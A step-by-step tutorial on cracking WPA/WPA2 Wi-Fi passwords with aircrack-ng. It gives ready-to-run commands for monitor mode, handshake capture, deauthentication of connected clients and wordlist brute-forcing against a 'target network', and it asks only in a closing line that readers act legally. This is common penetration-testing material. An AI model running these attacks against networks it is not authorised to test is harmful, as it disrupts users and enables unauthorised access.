How to Crack a Wifi
This tutorial demonstrates how to crack a Wi-Fi network using a wireless adapter in monitor mode and the aircrack-ng suite. Created by @bst04.
📌 Basic Information
1. Network Protocols
Understanding the protocols used in Wi-Fi networks is essential:
WEP (Wired Equivalent Privacy): An obsolete protocol with significant security flaws.
WPA (Wi-Fi Protected Access): Improved security over WEP but still vulnerable to weak passwords.
WPA2: More secure than WPA, using AES/PSK encryption. Still susceptible to brute-force attacks if weak passwords are used.
WPA3: The latest standard with enhanced protection against brute-force attacks. However, not all networks have adopted it yet.
2. Encryption and Authentication Methods
TKIP (Temporal Key Integrity Protocol): Legacy encryption with dynamic keys per packet; vulnerable to brute-force attacks.
AES (Advanced Encryption Standard): A secure symmetric encryption method widely used in modern Wi-Fi networks.
PSK (Pre-Shared Key): Commonly used for home networks, where a shared key is used for authentication. Vulnerable to brute-force attacks if the password is weak.
📋 Requirements
Before proceeding, ensure you have the following:
Aircrack-ng Suite: Installed on your system.
Wireless Adapter Compatible with Monitor Mode: Ensure your adapter supports packet injection and monitor mode.
🚀 Step-by-Step Process
Step 1: Install Aircrack-ng
If you're not using Kali Linux, you'll need to install the aircrack-ng suite. Run the following command in your terminal:
sudo apt-get update
sudo apt-get install aircrack-ngNote: If you're using Kali Linux, aircrack-ng is pre-installed.
Step 2: Enable Monitor Mode
To capture packets from the target network, your wireless adapter must be in monitor mode. First, identify your wireless interface by running:
ip addrOnce you know the interface name (e.g., wlan0), enable monitor mode:
sudo airmon-ng start [interface]Example:
If your interface is wlan0, run:
sudo airmon-ng start wlan0This will create a new interface, typically named wlan0mon.
Step 3: Scan for Wi-Fi Networks
Use airodump-ng to scan for nearby Wi-Fi networks:
sudo airodump-ng [interface + mon]Example:
If your monitor mode interface is wlan0mon, run:
sudo airodump-ng wlan0monThis will display a list of available networks, including their BSSID (MAC address), channel, and encryption type. Note down the details of the target network.
Step 4: Capture the Handshake
Focus on the target network by capturing its handshake. Use the following command:
sudo airodump-ng -c [channel] --bssid [BSSID] -w [output file] [interface + mon]Example:
If the target network is on channel 6 with BSSID 00:11:22:33:44:55, run:
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0monLeave this process running until the handshake is captured. You can verify the capture by checking the output file (capture-01.cap).
To speed up the handshake capture, deauthenticate connected clients using aireplay-ng:
sudo aireplay-ng -0 5 -a [BSSID] -c [STATION] [interface + mon]Example:
If the station (connected device) is 66:77:88:99:AA:BB, run:
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0monStep 5: Crack the Password
Once you have the handshake file, use aircrack-ng to attempt cracking the password. Provide a wordlist for brute-forcing:
sudo aircrack-ng -w [wordlist file] [handshake file]Example:
If your wordlist is rockyou.txt and the handshake file is capture-01.cap, run:
sudo aircrack-ng -w rockyou.txt capture-01.capThe tool will try each password in the wordlist until it finds a match or exhausts the list.
🛠Tips and Best Practices
Use a Strong Wordlist: Tools like
hashcator online resources provide comprehensive wordlists.Optimize Your Wireless Adapter: Ensure your adapter is compatible with packet injection and has good signal reception.
Be Patient: Cracking strong passwords may take time, depending on the complexity and length of the passphrase.
Conclusion
By following these steps, you can learn how to crack a Wi-Fi network using aircrack-ng. Remember to use this knowledge responsibly and within legal boundaries. Happy learning!
Last updated